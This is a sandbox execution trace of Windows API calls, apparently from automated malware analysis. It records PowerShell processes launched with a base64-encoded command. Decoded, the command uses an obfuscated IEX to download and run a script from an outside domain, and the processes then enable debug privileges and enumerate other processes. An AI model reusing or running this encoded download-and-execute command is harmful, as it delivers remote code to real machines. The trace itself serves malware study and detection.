	[0983.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0983.578] SetErrorMode (uMode=0x1) returned 0x1
	[0983.579] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd790 | out: lpFileInformation=0xcd790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0983.579] SetErrorMode (uMode=0x1) returned 0x1

Thread:
	id = 741
	os_tid = 0x16d8


Thread:
	id = 753
	os_tid = 0x1718


Thread:
	id = 1400
	os_tid = 0x1fc8


Thread:
	id = 1407
	os_tid = 0x1fec


Thread:
	id = 1488
	os_tid = 0x1c98


Thread:
	id = 1583
	os_tid = 0x2138


Thread:
	id = 1659
	os_tid = 0x22b0


Thread:
	id = 1662
	os_tid = 0x22c4

	[0824.461] CoGetContextToken (in: pToken=0x1b52f030 | out: pToken=0x1b52f030) returned 0x0
	[0824.461] CObjectContext::QueryInterface () returned 0x0
	[0824.461] CObjectContext::GetCurrentThreadType () returned 0x0
	[0824.461] Release () returned 0x0
	[0824.461] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0892.974] RegCloseKey (hKey=0x2d0) returned 0x0
	[0892.974] RegCloseKey (hKey=0x2d8) returned 0x0
	[0892.974] RegCloseKey (hKey=0x2d4) returned 0x0

Thread:
	id = 2000
	os_tid = 0x272c


Process:
	id = "145"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x4e7b6000"
	os_pid = "0x1690"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 735
	os_tid = 0x1694

	[0465.288] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 844
	os_tid = 0x12a8


Thread:
	id = 866
	os_tid = 0x13c4


Thread:
	id = 1554
	os_tid = 0x2098


Thread:
	id = 1560
	os_tid = 0x20b4


Thread:
	id = 1605
	os_tid = 0x218c


Thread:
	id = 1707
	os_tid = 0x23e8


Process:
	id = "146"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x4eb7b000"
	os_pid = "0x16a4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "30"
	os_parent_pid = "0x8e8"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 737
	os_tid = 0x16a8

	[0442.080] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0819.141] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0824.359] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0824.360] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0824.360] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0824.360] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0846.509] GetVersionExW (in: lpVersionInformation=0x14e040*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14e040*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0846.511] GetVersionExW (in: lpVersionInformation=0x14e040*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14e040*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0846.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.478] GetVersionExW (in: lpVersionInformation=0x14ddb0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14ddb0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0847.478] SetErrorMode (uMode=0x1) returned 0x1
	[0847.479] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14df10 | out: lpFileInformation=0x14df10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0847.480] SetErrorMode (uMode=0x1) returned 0x1
	[0847.487] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14e180 | out: lpdwHandle=0x14e180) returned 0x94c
	[0847.489] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2dc72a0 | out: lpData=0x2dc72a0) returned 1
	[0847.492] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14e0f8, puLen=0x14e0f0 | out: lplpBuffer=0x14e0f8*=0x2dc733c, puLen=0x14e0f0) returned 1
	[0847.494] lstrlenW (lpString="䅁") returned 1
	[0847.504] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14e068, puLen=0x14e060 | out: lplpBuffer=0x14e068*=0x2dc7418, puLen=0x14e060) returned 1
	[0848.447] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0848.449] CoTaskMemAlloc (cb=0x2e) returned 0x2b5880
	[0848.449] lstrcpyW (in: lpString1=0x2b5880, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0848.450] CoTaskMemFree (pv=0x2b5880) 
	[0848.450] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14e068, puLen=0x14e060 | out: lplpBuffer=0x14e068*=0x2dc746c, puLen=0x14e060) returned 1
	[0848.450] lstrlenW (lpString="System.Management.Automation") returned 28
	[0848.450] CoTaskMemAlloc (cb=0x3c) returned 0x268fd0
	[0848.450] lstrcpyW (in: lpString1=0x268fd0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0848.451] CoTaskMemFree (pv=0x268fd0) 
	[0848.451] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14e068, puLen=0x14e060 | out: lplpBuffer=0x14e068*=0x2dc74c8, puLen=0x14e060) returned 1
	[0848.451] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0848.451] CoTaskMemAlloc (cb=0x20) returned 0x2b6f10
	[0848.451] lstrcpyW (in: lpString1=0x2b6f10, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0848.451] CoTaskMemFree (pv=0x2b6f10) 
	[0848.451] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14e068, puLen=0x14e060 | out: lplpBuffer=0x14e068*=0x2dc7508, puLen=0x14e060) returned 1
	[0848.451] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0848.451] CoTaskMemAlloc (cb=0x44) returned 0x268fd0
	[0848.451] lstrcpyW (in: lpString1=0x268fd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0848.451] CoTaskMemFree (pv=0x268fd0) 
	[0848.451] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14e068, puLen=0x14e060 | out: lplpBuffer=0x14e068*=0x2dc7570, puLen=0x14e060) returned 1
	[0848.451] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0848.451] CoTaskMemAlloc (cb=0x76) returned 0x2529e0
	[0848.451] lstrcpyW (in: lpString1=0x2529e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0848.451] CoTaskMemFree (pv=0x2529e0) 
	[0848.451] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14e068, puLen=0x14e060 | out: lplpBuffer=0x14e068*=0x2dc760c, puLen=0x14e060) returned 1
	[0848.451] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0848.451] CoTaskMemAlloc (cb=0x44) returned 0x268fd0
	[0848.452] lstrcpyW (in: lpString1=0x268fd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0848.452] CoTaskMemFree (pv=0x268fd0) 
	[0848.452] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14e068, puLen=0x14e060 | out: lplpBuffer=0x14e068*=0x2dc7670, puLen=0x14e060) returned 1
	[0848.452] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0848.452] CoTaskMemAlloc (cb=0x58) returned 0x209270
	[0848.452] lstrcpyW (in: lpString1=0x209270, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0848.452] CoTaskMemFree (pv=0x209270) 
	[0848.452] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14e068, puLen=0x14e060 | out: lplpBuffer=0x14e068*=0x2dc76ec, puLen=0x14e060) returned 1
	[0848.452] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0848.452] CoTaskMemAlloc (cb=0x20) returned 0x2b6f10
	[0848.452] lstrcpyW (in: lpString1=0x2b6f10, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0848.452] CoTaskMemFree (pv=0x2b6f10) 
	[0848.452] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14e068, puLen=0x14e060 | out: lplpBuffer=0x14e068*=0x2dc7394, puLen=0x14e060) returned 1
	[0848.452] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0848.452] CoTaskMemAlloc (cb=0x66) returned 0x22c530
	[0848.452] lstrcpyW (in: lpString1=0x22c530, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0848.452] CoTaskMemFree (pv=0x22c530) 
	[0848.452] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14e068, puLen=0x14e060 | out: lplpBuffer=0x14e068*=0x0, puLen=0x14e060) returned 0
	[0848.452] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14e068, puLen=0x14e060 | out: lplpBuffer=0x14e068*=0x0, puLen=0x14e060) returned 0
	[0848.453] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14e068, puLen=0x14e060 | out: lplpBuffer=0x14e068*=0x0, puLen=0x14e060) returned 0
	[0848.453] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14e038, puLen=0x14e030 | out: lplpBuffer=0x14e038*=0x2dc733c, puLen=0x14e030) returned 1
	[0848.454] CoTaskMemAlloc (cb=0x204) returned 0x257f30
	[0848.454] VerLanguageNameW (in: wLang=0x0, szLang=0x257f30, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0848.457] CoTaskMemFree (pv=0x257f30) 
	[0848.457] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\", lplpBuffer=0x14e088, puLen=0x14e080 | out: lplpBuffer=0x14e088*=0x2dc72c8, puLen=0x14e080) returned 1
	[0848.463] GetCurrentProcessId () returned 0x16a4
	[0848.480] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x14cfb0 | out: lpLuid=0x14cfb0*(LowPart=0x14, HighPart=0)) returned 1
	[0849.457] GetCurrentProcess () returned 0xffffffffffffffff
	[0849.458] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x14cfd0 | out: TokenHandle=0x14cfd0*=0x2e0) returned 1
	[0849.459] AdjustTokenPrivileges (in: TokenHandle=0x2e0, DisableAllPrivileges=0, NewState=0x2dcab18*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0849.461] CloseHandle (hObject=0x2e0) returned 1
	[0849.465] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x16a4) returned 0x2e0
	[0849.475] EnumProcessModules (in: hProcess=0x2e0, lphModule=0x2dcab80, cb=0x200, lpcbNeeded=0x14dfe8 | out: lphModule=0x2dcab80, lpcbNeeded=0x14dfe8) returned 1
	[0849.478] GetModuleInformation (in: hProcess=0x2e0, hModule=0x13f370000, lpmodinfo=0x2dcadf0, cb=0x18 | out: lpmodinfo=0x2dcadf0*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0849.479] CoTaskMemAlloc (cb=0x804) returned 0x2b7a10
	[0849.479] GetModuleBaseNameW (in: hProcess=0x2e0, hModule=0x13f370000, lpBaseName=0x2b7a10, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0849.479] CoTaskMemFree (pv=0x2b7a10) 
	[0849.480] CoTaskMemAlloc (cb=0x804) returned 0x2b7a10
	[0849.480] GetModuleFileNameExW (in: hProcess=0x2e0, hModule=0x13f370000, lpFilename=0x2b7a10, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0849.481] CoTaskMemFree (pv=0x2b7a10) 
	[0849.481] CloseHandle (hObject=0x2e0) returned 1
	[0850.961] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x16a4) returned 0x2e0
	[0850.962] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0x14e118 | out: lpExitCode=0x14e118*=0x103) returned 1
	[0850.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12dcb088, Length=0x20000, ResultLength=0x14e0e0 | out: SystemInformation=0x12dcb088, ResultLength=0x14e0e0*=0x45e48) returned 0xc0000004
	[0850.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12deb0b8, Length=0x48648, ResultLength=0x14e0e0 | out: SystemInformation=0x12deb0b8, ResultLength=0x14e0e0*=0x45e48) returned 0x0
	[0852.723] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0852.723] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x558
	[0852.723] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0852.723] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0852.723] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0852.723] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x538
	[0852.723] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0852.724] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x778
	[0852.724] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x778
	[0852.724] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0852.724] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0852.724] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0852.724] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0852.724] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0852.724] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0852.725] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0852.725] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0852.725] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x460
	[0852.725] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0852.725] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0852.725] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1fb0
	[0852.725] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1e10
	[0852.726] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x23a8
	[0852.726] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1f24
	[0852.726] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x21ec
	[0852.726] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x2320
	[0852.726] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1fd4
	[0852.726] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1880
	[0852.726] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1b18
	[0852.726] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1d6c
	[0852.727] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x233c
	[0852.727] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x2368
	[0852.727] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x2124
	[0852.727] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x22f0
	[0852.727] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x22ac
	[0852.727] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1cdc
	[0852.727] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x10f0
	[0852.727] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1f18
	[0852.728] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x20a8
	[0852.728] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x2004
	[0852.728] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1f88
	[0852.728] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1f84
	[0852.728] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x2050
	[0852.728] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1e04
	[0852.728] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1ecc
	[0852.728] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1e64
	[0852.729] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1b58
	[0852.729] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1e94
	[0852.729] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1e28
	[0852.729] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1df8
	[0852.729] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1da8
	[0852.729] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1c70
	[0852.729] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x163c
	[0852.729] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1a10
	[0852.730] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x186c
	[0852.730] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1d74
